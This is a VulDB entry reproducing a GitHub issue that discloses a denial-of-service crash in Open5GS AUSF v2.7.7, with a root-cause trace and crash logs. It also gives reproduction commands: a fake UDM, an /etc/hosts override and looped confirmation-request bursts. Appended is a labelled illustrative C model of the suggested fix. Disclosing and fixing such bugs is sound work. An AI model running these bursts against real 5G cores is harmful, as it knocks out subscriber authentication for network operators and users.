| Title | Open5GS AUSF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AUSF crashes when a valid authentication context exists and
`PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation`
is sent in repeated bursts while UDM keeps `POST /nudm-ueau/v1/{supi}/auth-events`
hanging.
This follows the same pending-xact pattern as the already confirmed
`POST /nausf-auth/v1/ue-authentications` timer-pool issue, but the final abort
site is different:
```c
r = ausf_sbi_discover_and_send(...);
ogs_expect(r == OGS_OK);
ogs_assert(r != OGS_ERROR);
```
for the confirmation handler:
```c
bool ausf_nausf_auth_handle_authenticate_confirmation(...)
```
As with the POST route, client-side HTTP/2 streams are released on RST/close,
while outbound `nudm-ueau` xacts and their response timers remain pending until
timeout. Repeating short-lived confirmation bursts therefore consumes the timer
pool until `ogs_timer_add()` fails, `ausf_sbi_discover_and_send()` returns
`OGS_ERROR`, and AUSF aborts at `nausf-handler.c:115`.
### Root cause
- Entry route:
`PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation`
- Preconditions:
a valid auth context must already exist, and UDM must keep
`POST /nudm-ueau/v1/{supi}/auth-events` hanging
- Exact crash site:
`../src/ausf/nausf-handler.c:115`
- Upstream failures:
`../lib/core/ogs-timer.c:82-85`
`../lib/sbi/context.c:2592-2600`
`../src/ausf/sbi-path.c:97-103`
- Root cause family:
timer pool exhaustion leading to assertion abort
- Controlling factor:
number of short-lived confirmation requests whose outbound `auth-events`
xacts remain pending
### Steps to reproduce
1. Start the controllable fake UDM:
```bash
docker stop fake-ausf-udm 2>/dev/null || true
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker run --rm -d \
--name fake-ausf-udm \
--network open5gs \
-v /home/ubuntu/open5gs_277/.audit_tmp:/srv \
node:24-alpine \
node /srv/ausf_fake_udm.js
```
2. Restart AUSF, override `udm.open5gs.org` to the fake UDM, and create one
valid auth context:
```bash
docker restart ausf
docker exec ausf sh -lc "grep -v 'udm.open5gs.org' /etc/hosts > /tmp/hosts.new && printf '10.33.33.9\tudm.open5gs.org\n' >> /tmp/hosts.new && cat /tmp/hosts.new > /etc/hosts"
docker run --rm --network open5gs curlimages/curl:8.10.1 \
--http2-prior-knowledge -sS -D - \
-H content-type:application/json \
--data '{"supiOrSuci":"suci-0-001-01-0-0-0-000000000000001","servingNetworkName":"5G:mnc001.mcc001.3gppnetwork.org"}' \
http://ausf.open5gs.org/nausf-auth/v1/ue-authentications
```
The returned confirmation path in this repro was:
```text
/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation
```
3. Control case: one launch-only burst while UDM hangs `POST /auth-events`.
AUSF should stay running.
```bash
printf 'hang-auth-events-post\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode
docker exec fake-ausf-udm sh -lc 'AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' ausf
```
4. Malicious case: repeat the same burst several times so `auth-events` xacts
accumulate and exhaust the timer pool.
```bash
docker exec fake-ausf-udm sh -lc 'for i in 1 2 3 4 5 6 7; do AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js; done'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' ausf
docker logs --tail 120 ausf 2>&1
```
### Logs
```shell
04/23 01:59:22.204: [event] ERROR: Failed to allocate timer object from pool (../lib/core/ogs-timer.c:84)
04/23 01:59:22.204: [sbi] ERROR: ogs_timer_add() failed (../lib/sbi/context.c:2596)
04/23 01:59:22.204: [ausf] ERROR: ausf_sbi_discover_and_send() failed (../src/ausf/sbi-path.c:98)
04/23 01:59:22.212: [ausf] ERROR: ausf_nausf_auth_handle_authenticate_confirmation: Expectation `r == OGS_OK' failed. (../src/ausf/nausf-handler.c:114)
04/23 01:59:22.212: [ausf] FATAL: ausf_nausf_auth_handle_authenticate_confirmation: Assertion `r != OGS_ERROR' failed. (../src/ausf/nausf-handler.c:115)
```
### Expected behaviour
AUSF should reject excess pending confirmation work with a normal HTTP error and remain running.
### Observed Behaviour
Repeated launch-only confirmation bursts exhaust the timer pool for pending `auth-events` xacts and crash AUSF with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | https://github.com/open5gs/open5gs/issues/4472 |
|---|
| User | ZiyuLin (UID 93568) |
|---|
| Submission | 01.05.2026 10:36 (1 month ago) |
|---|
| Moderation | 16.05.2026 14:38 (15 days later) |
|---|
| Status | accepted |
|---|
| VulDB entry | 364332 [Open5GS up to 2.7.7 AUSF nausf-handler.c ogs_timer_add denial of service] |
|---|
| Points | 20 |
|---|
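The "Expected behaviour" in the report above (reject excess pending confirmation work, keep running) can be seen in a small model of a fixed timer pool whose slots are held until timeout. This is an added example, not Open5GS code and not from the reporter: every name, the pool size, the timeout and the choice of status 503 are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
/* Constructed model: names and sizes are hypothetical, not Open5GS values. */
#define POOL_SIZE 8      /* timers available for pending outbound xacts */
#define XACT_TIMEOUT 10  /* ticks an unanswered xact holds its timer */
#define REJECT_503 503   /* assumed overload status returned to the client */

static struct { bool used; int expires_at; } pool[POOL_SIZE];

/* Returns a slot index, or -1 when the pool is exhausted. */
static int timer_add(int now) {
    for (int i = 0; i < POOL_SIZE; i++)
        if (!pool[i].used) {
            pool[i].used = true;
            pool[i].expires_at = now + XACT_TIMEOUT;
            return i;
        }
    return -1;
}

/* A timer is released only by timeout, never by the client closing. */
static void expire_timers(int now) {
    for (int i = 0; i < POOL_SIZE; i++)
        if (pool[i].expires_at <= now) pool[i].used = false;
}

/* Allocation failure becomes an error response, not an assertion. */
static int handle_confirmation(int now) {
    expire_timers(now);
    return timer_add(now) < 0 ? REJECT_503 : 0; /* 0: xact now pending */
}

/* One burst of per_burst requests per tick; the peer never answers. */
int simulate(int bursts, int per_burst, int *accepted) {
    int rejected = 0;
    *accepted = 0;
    for (int i = 0; i < POOL_SIZE; i++) pool[i].used = false;
    for (int t = 0; t < bursts; t++)
        for (int k = 0; k < per_burst; k++) {
            if (handle_confirmation(t) == REJECT_503) rejected++;
            else (*accepted)++;
        }
    return rejected;
}

int main(void) {
    int ok, rej = simulate(7, 3, &ok);
    printf("accepted=%d rejected=%d\n", ok, rej);
    return 0;
}
```

In the model a single burst fits in the pool, repeated bursts are rejected once the pool is full, and capacity returns only as the pending timers expire.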